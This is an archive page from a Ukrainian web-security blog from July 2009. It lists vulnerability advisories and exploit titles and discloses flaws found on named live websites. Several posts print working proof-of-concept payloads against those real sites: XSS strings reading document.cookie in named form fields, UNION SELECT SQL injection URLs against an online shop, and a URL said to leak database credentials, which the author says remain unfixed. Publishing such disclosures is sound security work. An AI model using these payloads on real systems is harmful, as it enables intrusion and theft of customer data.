Архів для категорії 'Уразливості'

Добірка уразливостей

16:16 10.07.2009

В даній добірці уразливості в веб додатках:

  • Multiple vulnerabilities in Net Inspector 6.5.0.828 (деталі)
  • Several Webroot Disclosures on Moodle (деталі)
  • Persistent Cross-site Scripting (XSS) on Moodle via blog entry title (деталі)
  • Claroline 1.8.10 Multiple XSS Vulnerabilities (деталі)
  • Buffer-overflow in BootManage TFTPD 1.99 (деталі)
  • E-Mail header Injection in HiFriend (деталі)
  • Vulnerability: SocialEngine (SocialEngine.net) high risk security flaw (деталі)
  • Local File Include Vulnerability in Interact 2.4.1 (деталі)
  • MyBlog <=0.9.8 Multiple Vulnerabilities (деталі)
  • EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability (деталі)

Уразливості на unian.net

19:23 09.07.2009

01.05.2009

У серпні, 10.08.2008, я знайшов Cross-Site Scripting уразливості на сайті http://unian.net (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

09.07.2009

XSS:

POST запит на сторінці коментарів (http://unian.net/ukr/comments/248912)
"><script>alert(document.cookie)</script>В полях: user_name, user_email, url (в полі user_email уразливість вже виправлена).

XSS через GET:

Більшість з уразливостей так досі й не виправлені.

Добірка уразливостей

16:17 08.07.2009

В даній добірці уразливості в веб додатках:

  • Fuzzylime 3.01 Remote Code Execution Exploit (деталі)
  • Java Web Start tempbuff Stack Buffer Overflow (деталі)
  • Java Web Start encoding Stack Buffer Overflow (деталі)
  • Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability (деталі)
  • openPro 1.3.1 (LIBPATH) Remote RFI Vulnerability (деталі)
  • Local File Include in Dokeos E-Learning System 1.8.5 (деталі)
  • communitycms-0.1 Remote File Includion (деталі)
  • File read in Velocity web-server (деталі)
  • Claroline 1.8.9 Multiple Security Vulnerabilities (деталі)
  • CSRF (Cross-site Request Forgery) on Moodle edit profile page (деталі)

Добірка уразливостей

16:13 04.07.2009

В даній добірці уразливості в веб додатках:

  • Xitami Web Server Multiple Vulnerabilities (Exploit) (деталі)
  • XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower (деталі)
  • PHP-NUKE SQL Module’s Name 4ndvddb (деталі)
  • BitTorrent Clients and CSRF (деталі)
  • MorASP Anket Sistemi v2.0 [PID] Bypass Vulnerability (tr) (деталі)
  • phpuserbase 1.3 (menu) Remote File Inclusion Vulnerability (деталі)
  • gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability (деталі)
  • OkulAjansi [ID] Remote SQL Injection Vulnerability (деталі)
  • Yuhhu Pubs Black Cat Remote SQL Injection Exploit (деталі)
  • Pluck Local File inclusion (деталі)

Уразливості на datingsites1000.com

23:57 03.07.2009

У жовтні, 02.10.2008, я знайшов Cross-Site Scripting, Insufficient Anti-automation, SQL Injection, Abuse of Functionality та Information Leakage уразливості на сайті http://datingsites1000.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

Уразливості на tvshop.com.ua

19:26 03.07.2009

21.04.2009

У липні, 24.07.2008, я виявив Full path disclosure, SQL Injection та Information Leakage уразливості на сайті http://tvshop.com.ua (інтернет магазин), що також доступний за адресою http://i-shop.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.cddoma.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

03.07.2009

Full path disclosure:

http://tvshop.com.ua/itemlist.php?cid=’

http://tvshop.com.ua/item.php

http://tvshop.com.ua/itemlist.php

http://tvshop.com.ua/catalog.php

SQL Injection:

http://tvshop.com.ua/itemlist.php?cid=-1%20or%20version()=4.0

http://tvshop.com.ua/catalog.php?cid=-1%20union%20select%201,version(),1,1,1/*

MySQL 4.0.27-standard-log

Зазначу, що в таблиці клієнтів магазину в БД торік, 24.07.2008, було 17197 записів. А сьогодні, майже через рік, 18112 записів. Тобто майже за рік у магазина збільшилося число клієнтів на 915. А хтось тут про кризис росказує :-) .

Information Leakage:

http://tvshop.com.ua/init.tpl

Витік login, password і name для бази даних та Source Code Disclosure.

Дані уразливості досі не виправлені.

Уразливості на www.linkexchanger.ru, www.od.com.ua, і www.lishnih.net

23:58 02.07.2009

У липні, 18.07.2008, я знайшов Cross-Site Scripting уразливості на сайтах http://www.linkexchanger.ru, http://www.od.com.ua і http://www.lishnih.net. Що використовують веб додаток LinksExchanger, про уразливості в якому я писав нещодавно.

XSS:

POST запит на сторінках linkexchanger.ru/dir/submit.php, od.com.ua/links/submit.php і lishnih.net/catalog/submit.php.
"><body onload="alert(document.cookie)В полях: Ваше имя или ник, Текстовое описание Вашей ссылки.

XSS через GET:

http://www.linkexchanger.ru

http://www.od.com.ua

http://www.lishnih.net

Експлоіти для Apache №7

22:35 02.07.2009

Продовжуючи тему експлоітів для Apache, пропоную вам нову добірку експлоітів для цього веб сервера.

Дані експлоіти для уразливостей в Apache Tomcat та Apache mod_dav / svn. Адмінам варто слідкувати за оновленням своїх серверів.

  • Apache Tomcat untime.getRuntime().exec() Privilege Escalation (win) (деталі)
  • Apache mod_dav / svn Remote Denial of Service Exploit (деталі)

Добірка уразливостей

16:40 02.07.2009

В даній добірці уразливості в веб додатках:

  • D-Link DIR-100 long url filter evasion (деталі)
  • Turuncu Galeri [galeri_edit.asp] Permission Bypass Vulnerability (деталі)
  • Sagem router f@st 2404 remote reset poc (деталі)
  • Sagem Router F@ST 2404 Remote Denial Of Service Exploit (деталі)
  • RSS-aggregator Multiple vulnerabilities (деталі)
  • Wordtrans-web Remote Command Execution Vulnerability (деталі)
  • Wordtrans-web Remote Command Execution Vulnerability (деталі)
  • PHP Nuke Platinium <= 7.6.b.5 Remote Code Execution Exploit (деталі)
  • Multiple RFI-LFI in 1024 CMS 1.4.3, 1.4.4 RFC (деталі)
  • Xpoz SQL-INJECTION, XSS (деталі)

Уразливості в плагінах для WordPress №19

23:59 30.06.2009

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах DM Albums і Related Sites. Для котрих з’явилися експлоіти. DM Albums - це плагін для створення фото альбомів та галерей, Related Sites - це плагін для показу лінок на сайти інших користувачів даного плагіна.

  • WordPress Plugin DM Albums 1.9.2 Remote File Inclusion Vuln (деталі)
  • WordPress Plugin DM Albums 1.9.2 Remote File Disclosure Vulnerability (деталі)
  • WordPress Plugin Related Sites 2.1 Blind SQL Injection Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

P.S.

Експлоіт до плагіна Related Sites неробочий, тому що заявлена SQL Injection уразливість відсутня. Тому власники даного плагіна можуть не переживати з приводу цього експлоіта.